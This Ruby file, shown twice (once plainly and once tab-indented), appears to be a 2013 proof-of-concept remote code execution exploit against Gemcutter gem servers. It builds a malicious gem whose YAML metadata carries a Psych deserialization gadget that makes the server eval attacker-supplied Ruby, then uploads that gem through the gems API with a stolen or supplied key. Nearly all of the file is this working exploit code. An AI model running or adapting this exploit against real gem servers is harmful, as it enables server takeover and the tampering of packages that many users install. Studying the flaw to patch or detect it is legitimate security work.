postmodern/gemcutter_rce.rb

## gemcutter_rce.rb
#!/usr/bin/env ruby
#
# Proof-of-Concept RCE exploit against Gemcutter
#
# ## Advisory
#
# * TBA
#
# ## Caveats
#
# * rubygems.org has disabled gem uploads until the vulnerability is fixed.
#   However, other Gemcutter instances are vulnerable.
#
# ## Synopsis
#
#   $ gemcutter_rce.rb BASE_URL API_KEY RUBY
#
# ## Dependencies
#
#   $ gem install ronin-support
#
# ## Example
#
#   $ gemcutter_rce.rb https://host.com $API_KEY "sleep 4"
#
# ## License
#
# Copyright (c) 2013 Postmodern
#
# This exploit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This exploit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this exploit.  If not, see <http://www.gnu.org/licenses/>.
#
# ## Shoutz
#
# drraid, cd, px, sanitybit, sysfail, trent, dbcooper, goldy, coderman, letch,
# starik, toby, jlt, HockeyInJune, cloud, zek, natron, amesc, postmodern,
# mephux, nullthreat, evoltech, flatline, r0bglesson, lianj, @bascule,
# @charliesome, @homakov, @envygeek, @blambeau
# (for originally reporting the vuln one whole week ago),
# @dtao (for safe_yaml), @qrush, @evanphx, YAML, Kreayshawn, Lil Debbie, Boxxy,
# Randy Savage, "rockin' the wolf on your noggin", SophSec crew and affiliates.
#

require 'ronin/network/http'
require 'ronin/ui/output'
require 'yaml'

include Ronin::Network::HTTP
include Ronin::UI::Output::Helpers

def exploit(base_url,api_key,payload)
  spec = Gem::Specification.new do |gem|
    gem.name     = 'acts_as_exploit'
    gem.version  = Array.new(3) { rand(50) }.join('.')
    gem.author   = 'Hacker'
    gem.email    = 'support@rubygems.org'
    gem.homepage = 'http://rubygems.org/'

    gem.files    = [File.basename($0)]

    gem.summary     = %{PoC malicious gem that exploits YAML.load in gemcutter}
    gem.description = %{
A Proof-of-Concept PoC gem that exploits a vulnerability in the Psych YAML
parser, which allows the #[]= method to be called on arbitrary Objects.
If the #[]= method later calls eval() with the given arguments, this allows for
arbitrary execution of code.

If you find this gem on your Gemcutter instance, you are vulnerable and every
gem that has been uploaded could be modified.
    }.strip

    class << gem
      attr_accessor :payload

      def to_yaml(*)
        payload         = "(#{@payload}; @executed = true) unless @executed"
        escaped_payload = "foo\n#{payload}\n__END__\n"
        encoded_payload = escaped_payload.to_yaml.sub('--- ','').chomp

        super + %{exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
  ? #{encoded_payload}
  : !ruby/object:OpenStruct
    table:
      :defaults:
        :action: create
        :controller: foos
      :required_parts: []
      :requirements:
        :action: create
        :controller: foos
      :segment_keys:
      - :format
    modifiable: true
}
      end
    end

    gem.payload = payload
  end

  print_info "Building malicious gem containing #{payload} ..."

  builder = Gem::Builder.new(spec)
  gem     = File.new(builder.build,'rb')

  print_info "Uploading malicious gem to #{base_url} ..."

  return http_post(
    :url     => "#{base_url}/api/v1/gems",
    :headers => {
      :content_type   => 'application/octet-stream',
      :content_length => gem.size,
      :authorization  => api_key
    },
    :body    => gem.read
  )
end

if $0 == __FILE__
  unless ARGV.length == 3
    $stderr.puts "usage: #{$0} BASE_URL API_KEY RUBY"
    exit -1
  end

  base_url = ARGV[0]
  api_key  = ARGV[1]
  payload  = ARGV[2]

  response = exploit(base_url,api_key,payload)

  case response.code
  when '200' then print_info "Success!"
  else
    print_error "Error #{response.code}"
    print_error response.body
  end
end
	#!/usr/bin/env ruby
	#
	# Proof-of-Concept RCE exploit against Gemcutter
	#
	# ## Advisory
	#
	# * TBA
	#
	# ## Caveats
	#
	# * rubygems.org has disabled gem uploads until the vulnerability is fixed.
	# However, other Gemcutter instances are vulnerable.
	#
	# ## Synopsis
	#
	# $ gemcutter_rce.rb BASE_URL API_KEY RUBY
	#
	# ## Dependencies
	#
	# $ gem install ronin-support
	#
	# ## Example
	#
	# $ gemcutter_rce.rb https://host.com $API_KEY "sleep 4"
	#
	# ## License
	#
	# Copyright (c) 2013 Postmodern
	#
	# This exploit is free software: you can redistribute it and/or modify
	# it under the terms of the GNU General Public License as published by
	# the Free Software Foundation, either version 3 of the License, or
	# (at your option) any later version.
	#
	# This exploit is distributed in the hope that it will be useful,
	# but WITHOUT ANY WARRANTY; without even the implied warranty of
	# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	# GNU General Public License for more details.
	#
	# You should have received a copy of the GNU General Public License
	# along with this exploit. If not, see <http://www.gnu.org/licenses/>.
	#
	# ## Shoutz
	#
	# drraid, cd, px, sanitybit, sysfail, trent, dbcooper, goldy, coderman, letch,
	# starik, toby, jlt, HockeyInJune, cloud, zek, natron, amesc, postmodern,
	# mephux, nullthreat, evoltech, flatline, r0bglesson, lianj, @bascule,
	# @charliesome, @homakov, @envygeek, @blambeau
	# (for originally reporting the vuln one whole week ago),
	# @dtao (for safe_yaml), @qrush, @evanphx, YAML, Kreayshawn, Lil Debbie, Boxxy,
	# Randy Savage, "rockin' the wolf on your noggin", SophSec crew and affiliates.
	#

	require 'ronin/network/http'
	require 'ronin/ui/output'
	require 'yaml'

	include Ronin::Network::HTTP
	include Ronin::UI::Output::Helpers

	def exploit(base_url,api_key,payload)
	spec = Gem::Specification.new do \|gem\|
	gem.name = 'acts_as_exploit'
	gem.version = Array.new(3) { rand(50) }.join('.')
	gem.author = 'Hacker'
	gem.email = 'support@rubygems.org'
	gem.homepage = 'http://rubygems.org/'

	gem.files = [File.basename($0)]

	gem.summary = %{PoC malicious gem that exploits YAML.load in gemcutter}
	gem.description = %{
	A Proof-of-Concept PoC gem that exploits a vulnerability in the Psych YAML
	parser, which allows the #[]= method to be called on arbitrary Objects.
	If the #[]= method later calls eval() with the given arguments, this allows for
	arbitrary execution of code.

	If you find this gem on your Gemcutter instance, you are vulnerable and every
	gem that has been uploaded could be modified.
	}.strip

	class << gem
	attr_accessor :payload

	def to_yaml(*)
	payload = "(#{@payload}; @executed = true) unless @executed"
	escaped_payload = "foo\n#{payload}\n__END__\n"
	encoded_payload = escaped_payload.to_yaml.sub('--- ','').chomp

	super + %{exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
	? #{encoded_payload}
	: !ruby/object:OpenStruct
	table:
	:defaults:
	:action: create
	:controller: foos
	:required_parts: []
	:requirements:
	:action: create
	:controller: foos
	:segment_keys:
	- :format
	modifiable: true
	}
	end
	end

	gem.payload = payload
	end

	print_info "Building malicious gem containing #{payload} ..."

	builder = Gem::Builder.new(spec)
	gem = File.new(builder.build,'rb')

	print_info "Uploading malicious gem to #{base_url} ..."

	return http_post(
	:url => "#{base_url}/api/v1/gems",
	:headers => {
	:content_type => 'application/octet-stream',
	:content_length => gem.size,
	:authorization => api_key
	},
	:body => gem.read
	)
	end

	if $0 == __FILE__
	unless ARGV.length == 3
	$stderr.puts "usage: #{$0} BASE_URL API_KEY RUBY"
	exit -1
	end

	base_url = ARGV[0]
	api_key = ARGV[1]
	payload = ARGV[2]

	response = exploit(base_url,api_key,payload)

	case response.code
	when '200' then print_info "Success!"
	else
	print_error "Error #{response.code}"
	print_error response.body
	end
	end